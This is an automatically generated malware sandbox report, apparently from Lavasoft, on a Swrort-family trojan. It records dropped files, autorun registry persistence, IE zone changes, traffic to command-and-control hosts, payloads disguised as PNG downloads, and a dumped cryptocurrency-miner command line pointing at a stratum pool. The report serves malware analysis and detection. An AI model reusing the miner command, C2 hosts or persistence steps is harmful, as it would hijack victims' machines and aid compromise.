Trojan.Win32.Swrort.3_204939cf63

by malwarelabrobot on July 9th, 2014 in Malware Descriptions.
Trojan.Win32.Chebri.jm (Kaspersky), Gen:Variant.Symmi.42922 (AdAware), Trojan.Win32.Swrort.3.FD, Trojan.Win32.Swrort.5.FD, GenericInjector.YR (Lavasoft MAS) Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 204939cf633f794950a64b42ef0088de SHA1: c2ad31eb6e50f0eac6c6df2aa8334da720683eee SHA256: 359fc8444f51630ffe613c5a1683e79126d4cf4de3312cf5840e3811ffbdd879 SSDeep: 1536:ug2DwhXt6GdnssmBhWGKdEfnReWUkANjq3PTepCv9czvIKsF5iDZkEdvisaE0g:/2M1p94TWGKdEEWcdkbepACzIKK5iDZB Size: 95744 bytes File type: EXE Platform: WIN32 Entropy: Not Packed PEID: UPolyXv05_v6 Company: no certificate found Created at: 2014-06-07 07:24:11 Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

0003F.tmp.exe:1500
%original file name%.exe:1836

The Trojan injects its code into the following process(es):

%original file name%.exe:640
minerd.exe:364

Mutexes

The following mutexes were created/opened: No objects were found.

File activity

The process %original file name%.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
%Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
%Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
%Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (0 bytes)

Registry activity

The process 0003F.tmp.exe:1500 makes changes in the system registry.
The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WINSXS32"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WINSXS32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"

The process %original file name%.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF B2 08 ED 19 F4 D8 3A 08 CE A1 F7 59 C7 2F 06"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 9C 07 5D EF F6 B5 55 E4 20 15 4E E3 EE 30 84"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402115051"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

The process minerd.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 0E 2B E0 B3 5E 71 F6 03 B0 96 15 E8 8A 93 8A"

Dropped PE files

MD5 File path
b3b52fec86b2f0602e4ee6726cedb475c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll
ac05fbba61f939cd90133032f2595c69c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409639679399364.4983979a4a2e4dcaf9a3aeeee6e2782378240
.rdata4505616206163843.6265870c87e14c493e857c346d7b32c1713c4
.data614401962876804.01315bfdf697f4ba0816dbcf9330733889a0a
.85564581920365120.494564305edff9a269f78669d34a099c4bf1f
.41d335986016365120.4955820d37efda672e26ceb5f6ff7e7ae2a1af
.c3a6f79011245120.056519d46190223de12e4e4a1db0b9c8d15584
.rsrc9420828792291844.767067282b099135755d52d4a881e04ea2936

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://carpetbrownsurface.com/index.php
hxxp://www5.0zz0.com/2014/05/28/22/846767599.png
hxxp://google.com/
hxxp://www.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw
hxxp://www6.0zz0.com/2014/05/29/00/888256212.png
hxxp://www13.0zz0.com/2014/05/29/00/562309044.png

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response

Traffic

GET /2014/05/29/00/888256212.png HTTP/1.1
Host: www6.0zz0.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:38 GMT
Server: Apache
Last-Modified: Thu, 29 May 2014 00:16:18 GMT
ETag: "d71032a-468a9-d67a3880"
Accept-Ranges: bytes
Content-Length: 288937
Connection: close
Content-Type: image/png
ZS...vH......Q6..HciO..z9..F.......7..6E.~jx)Wn...._. .quA.]9..S.$RS..
.H^N...`n.~..z8..z...vHuX\.....~QpPU...L@l..g...r'w...b.......^W.'....
..3..!.-....]qb...y|...f.....6.s.2......<.t...S>..H.D.N..@f.bu3z
...^N.X.[S. Ds....0d=....!.{..(?Pz.V.}....73.....d...F........[.d?.|J.
b....chE.n1..[.o*tvb.\s..8.....b.O..'`v...7..tq.........6XS......@....
Q6..H.X.&...n...................-..........s..$$......H....d...f...<
;x.c..iA.p=..J(Ic.T[<.JE{._.R...............B/......O5..y...,J.|[..
pWT...c.`..........!.ix..b@.sn....H.X.i.......rVh.2z.h....]....i.....m
..r.T-0..........I...`.H.......^Qr.A...]hQq.r.h.nD..e.)B.y$.`.R38.AM):
......'...(}...*....b.I.f|.....8..,.......`8.\z.....h....\..r...`.mh..
8,.D...."...@.O9..*$N.%.1....d'-.....qg.`y...w6f..j..2&......w ...|...
}..J.u.......}...cxFL09X...............,...-[aT./N..H..U..6..V..F.Z...
U.(.j..C.....(.-..W..M...#VYGRl.?..7&..a......h\.. .....z._SO..04....*
.U...}/.k<Y:.a..HH......h...B...e.6`.f.. ...........lh.".....].....
.`.Q.R........u../..=..a...2..........Cz.`...L..s.....HV*.b.[.)&......
|^7c.......a.....v.#H..yC.l.^G.t.G...S.'...pF..G..:G...lG2a....9*... .
.R..F....NrW.0.f#.....s0y...5.a..\1M....TP......Z..:..........t.,.]FA.
....B-.c..s]/.I.....#N.YQ..U..18JA..>.`....?.;G.tz.G?.......NM.....
C^3.........Z0....-3.J..7....B..xvp..V..]....T.K.......QeX...d.G..aB..
1.L...2..q0.A.j(..U..O_..p..B...G....,J.q.k%.|..?8...D..X8.6.1L4..`W.u
c.K...:.....S...;....c,&.aV.........M..~ ...p....Kz.t...l.....T.-h.M..
.....W....^>"...h.r.:L.!..(S.....].7...D.`.]~..~GC..@.n.....%..
<<< skipped >>>

GET /2014/05/29/00/562309044.png HTTP/1.1
Host: www13.0zz0.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:37 GMT
Server: Apache
Last-Modified: Thu, 29 May 2014 00:16:44 GMT
ETag: "71702c3-468a9-d806f300"
Accept-Ranges: bytes
Content-Length: 288937
Connection: close
Content-Type: image/png
ZS...vH......Q6..HciO..z9..F.......7..6E.~jx)Wn...._. .quA.]9..S.$RS..
.H^N...`n.~..z8..z...vHuX\.....~QpPU...L@l..g...r'w...b.......^W.'....
..3..!.-....]qb...y|...f.....6.s.2......<.t...S>..H.D.N..@f.bu3z
...^N.X.[S. Ds....0d=....!.{..(?Pz.V.}....73.....d...F........[.d?.|J.
b....chE.n1..[.o*tvb.\s..8.....b.O..'`v...7..tq.........6XS......@....
Q6..H.X.&...n...................-..........s..$$......H....d...f...<
;x.c..iA.p=..J(Ic.T[<.JE{._.R...............B/......O5..y...,J.|[..
pWT...c.`..........!.ix..b@.sn....H.X.i.......rVh.2z.h....]....i.....m
..r.T-0..........I...`.H.......^Qr.A...]hQq.r.h.nD..e.)B.y$.`.R38.AM):
......'...(}...*....b.I.f|.....8..,.......`8.\z.....h....\..r...`.mh..
8,.D...."...@.O9..*$N.%.1....d'-.....qg.`y...w6f..j..2&......w ...|...
}..J.u.......}...cxFL09X...............,...-[aT./N..H..U..6..V..F.Z...
U.(.j..C.....(.-..W..M...#VYGRl.?..7&..a......h\.. .....z._SO..04....*
.U...}/.k<Y:.a..HH......h...B...e.6`.f.. ...........lh.".....].....
.`.Q.R........u../..=..a...2..........Cz.`...L..s.....HV*.b.[.)&......
|^7c.......a.....v.#H..yC.l.^G.t.G...S.'...pF..G..:G...lG2a....9*... .
.R..F....NrW.0.f#.....s0y...5.a..\1M....TP......Z..:..........t.,.]FA.
....B-.c..s]/.I.....#N.YQ..U..18JA..>.`....?.;G.tz.G?.......NM.....
C^3.........Z0....-3.J..7....B..xvp..V..]....T.K.......QeX...d.G..aB..
1.L...2..q0.A.j(..U..O_..p..B...G....,J.q.k%.|..?8...D..X8.6.1L4..`W.u
c.K...:.....S...;....c,&.aV.........M..~ ...p....Kz.t...l.....T.-h.M..
.....W....^>"...h.r.:L.!..(S.....].7...D.`.]~..~GC..@.n.....%..
<<< skipped >>>

POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: 4C9B53A8086004515190B6B74733CD51
Host: carpetbrownsurface.com
Content-Length: 175
Cache-Control: no-cache

0=D4DD6EBD91&1=0&2=A7BE76C69182033329D77E&3=B0BE2CF2D2B8134E4FBE0E8E3DAA&4=AF9D2FF6CCF5613439A12AC11ACB754E1F10368B349407C22F0E555EB6C25950F4E3DB52CCD4EF9C615AE3B0CEF613&5=&6=
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 03 Jul 2014 16:54:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14 deb7u9
258....[...3...O.$s.4?S..|.S.5.Z...L;...R....|F....Y....H.R..V.[.....:
....d)..o.W....r..9-\,e2e.).*. .)&8%...........%_^.G......hGn. ..u....
..$.h..3.H..E!..#.].I.e.p8...]_.H.T@.~..\'..x.{AX.M..".........5s.%..N
:.....g.t{....U....>.i.qJRm...R.cl/!.v..(....Z.H.M|.D.PZ.......@...
..^....Y.F.m....o>O.9........z.j.. b#../.N.2}_e..E9.a..hA=b........
t.:.ZE.;.....j..q......{$R....8Z..M........a//..kC ....u.F.w..(.7.j...
...|..'..i..O....T.d]U..8^..U.\....N.K.H...u.<....Z ..$.....'a.Q`.Q
O...[.@ *)...D.....o...H.m.%.i..8.!..1....w..}.......X...nM.r......&..
//..G.....3.D..M.....K..s.4....A.a....!,......lH...7 ...0..

GET / HTTP/1.1
Host: google.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw
Content-Length: 258
Date: Thu, 03 Jul 2014 17:02:42 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf5
1oCQAw">here</A>...</BODY></HTML>....

GET /2014/05/28/22/846767599.png HTTP/1.1
Host: www5.0zz0.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:35 GMT
Server: Apache
Last-Modified: Wed, 28 May 2014 22:59:13 GMT
Accept-Ranges: bytes
Content-Length: 4608
Connection: close
Content-Type: image/png
..#./.7..@.W..^.........M..K.W...m........R....@.--......Zy.......G...
......Xm........(..]....-....'...j0.bs...w....d.......D9.u%......S!.}.
..:......o....I<Rc;....Mb..q...v}..R....Y......vl.b.H .#.O;.F....D.
....X...z...c:n...&p.0....}O..Ox9G..:.I.mV.._B.&.5%..`.0LM.......C.2..
..U...7......LS[..@.f.n.... ...........Q......Oy.E..^.T...x.%.....g..5
8=....Q.%.....t..........$.{...*.~.nm.....$.E....n...88p.....9.o-.s.q.
i...MP....S..R.4.oCz.*.....g.df...X'..;....?~..K.B.(....@.T. .........
n.A@.....~.d...]8..R.f...0.T.....i..<.h....A..`............].o...!.
.Xqa8..5Wc@.L=.&.%.p.@..U'....<..3..4H7.u..V....j...\...v.Sv*s.j..V
=.V...K.vUd....){.._Q....V26.=.].Y$*...M3j..Jw`...B..!1..)....JL...A..
....P........?@...d.$......ye..1.....r.e.e......a`...-U$.<..>...
9.%<Z.8.}..g.=....^....p.K..%.....]....$)......G...o.\.~.<c.4?9a
....P.@....N.)7..0%h...h..u.D..Q.0..G4.....}.....;8..UA.sAV.H.........
..<...?fs...N$...Br a.vx.....y.....(...........CRJgf......0...-....
..~.'......Vw...y.....&.!!...{A.G.[.d.....Xc.b4..:vw*.......i.......G.
..x.....U|.cd,.@..~e..IT~.g?.4.{.po.....!.[p....1.v.\......'.'. 3.>
.9.........7O......d28....................*..*gH .8...O..!\.?D......=.
Iyq..^...j...f..`.$F....(R.,..'...U.3..:Y...4..X....a...v..:.......8..
j.^...;......Q..:b..... 5....m.KoA......>q....16.e#32.<Ty.......
9..q..G..5....5......mu..3.y.....W.....K....*.gH...<%-...@.b...!.{^
.....7.9..7.}y...`......?Ma.(...X .M.Z.C4J...|..5.:..do...N.IJ.F{.....
./..x7}BH."..Q....v.F...... .]..:-_b..&....!.-...d.....f\.....O...
<<< skipped >>>

GET /?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw HTTP/1.1
Host: VVV.google.ca
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:42 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: PREF=ID=a925c378d21ce293:FF=0:TM=1404406962:LM=1404406962:S=KArret2NkGUXTIqS; expires=Sat, 02-Jul-2016 17:02:42 GMT; path=/; domain=.google.ca
Set-Cookie: NID=67=BoS7-YpbkZYYxrZzYwTQm7_Eq70VeqxwWULcrm4HbSYyV4u7QEL-lisxKUuFWiBmnSrvSwXutG5XPxcnG663bxQ6eFoPkEdaP9PFL7SOpMcZ5UeObC5efZKJkZtaXdfM; expires=Fri, 02-Jan-2015 17:02:42 GMT; path=/; domain=.google.ca; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic
Transfer-Encoding: chunked
8000..<!doctype html><html itemscope="" itemtype="hXXp://sche
ma.org/WebPage" lang="en-CA"><head><meta content="/images/
google_favicon_128.png" itemprop="image"><title>Google</ti
tle><script>(function(){.window.google={kEI:"soy1U_T9DaPksASZ
nIGoAw",getEI:function(a){for(var c;a&&(!a.getAttribute||!(c=a.getAttr
ibute("eid")));)a=a.parentNode;return c||google.kEI},https:function(){
return"https:"==window.location.protocol},kEXPI:"4791,4896,17259,40001
16,4007661,4007830,4008142,4009033,4009641,4010806,4010858,4010899,401
1228,4011258,4011679,4012373,4012504,4013395,4013414,4013591,4013723,4
013787,4013823,4013920,4013967,4013979,4014016,4014093,4014431,4014515
,4014637,4014671,4014804,4014991,4015234,4015236,4015260,4015266,40155
50,4015587,4015633,4015772,4015989,4016127,4016309,4016367,4016372,401
6487,4016824,4016855,4016976,4017162,4017204,4017280,4017285,4017544,4
017554,4017579,4017595,4017612,4017639,4017681,4017694,4017710,4017742
,4017789,4017818,4017881,4017894,4017902,4017913,4017981,4017982,40180
09,4018019,4018030,4018126,4018159,4018283,4018363,4018416,4018480,401
8511,4018519,4018532,4018542,4018554,4018569,4018621,4018638,4018757,4
018834,4018914,4018923,4018933,4018949,4019005,4019037,4019074,4019084
,4019142,4019184,4019191,4019200,4019205,4019268,4019281,4019387,40194
15,4019423,4019427,4019429,4019438,4019661,8300007,8300012,8300027,830
0057,8500223,8500256,8500272,8500306,8500357,8500365,8500394,8500421,8
500433,8500444,8500462,8500470,8500472,8500495,10200044,10200083,1
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_640:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
|PAM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
http://www5.0zz0.com/2014/05/28/22/846767599.png
Shttp://google.com/
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
minerd.exe
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
@c:\%original file name%.exe
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Application Data
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%System%
xncqnyyorsxlq.exe
wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
libcurl.dll
2.5.1
%original file name%.exe_640_rwx_00330000_00004000:
.rdart
32.dl
2<3=4>5?6?7?8
ntdll.dll
%original file name%.exe_640_rwx_00340000_00021000:
.rdart
32.dl
2<3=4>5?6?7?8
%original file name%.exe_640_rwx_00370000_00033000:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
AM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%original file name%.exe_640_rwx_00400000_00036000:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
|PAM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
http://www5.0zz0.com/2014/05/28/22/846767599.png
Shttp://google.com/
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
minerd.exe
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
@c:\%original file name%.exe
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Application Data
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%System%
xncqnyyorsxlq.exe
wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
libcurl.dll
2.5.1
%original file name%.exe_640_rwx_00960000_00018000:
.text
`.rdata
@.data
.rsrc
314127.64
GetProcessWindowStation
ActivateKeyboardLayout
CreateDialogIndirectParamA
EnumChildWindows
EnumThreadWindows
EnumWindows
GetAsyncKeyState
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutNameA
GetKeyboardState
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
SetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
ShellExecuteA
SHELL32.dll
OPENGL32.dll
CreateIoCompletionPort
GetCPInfo
KERNEL32.dll
u.vr-
KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
File %PayloadOne was not foundYError: Unable to complete operation %PayloadOne, no %PayloadTwo file has been opened yet.
File %PayloadOne already exists,Invalid Handle, unable to complete operation
-Failed to open file %PayloadOne, error %error*Not enough diskspace to complete operationOFailed to execute
Error: %error.MSI installation failed with error code %erroriAnother installation is already in progress
Operation '%PayloadOne' was not foundYUser has canceled the operation, rolling back changes, If you see this message it's a bug{Insufficient Rights to complete operation
Please be sure you have Administrator rights before attempting installation againDFailed to open requested registry key
Key: %PayloadOne
Error: %error7Requested registry operation failed
Error: Invalid HiveJFailed to create the requested registry key
Error: %errorJFailed to delete the requested registry key
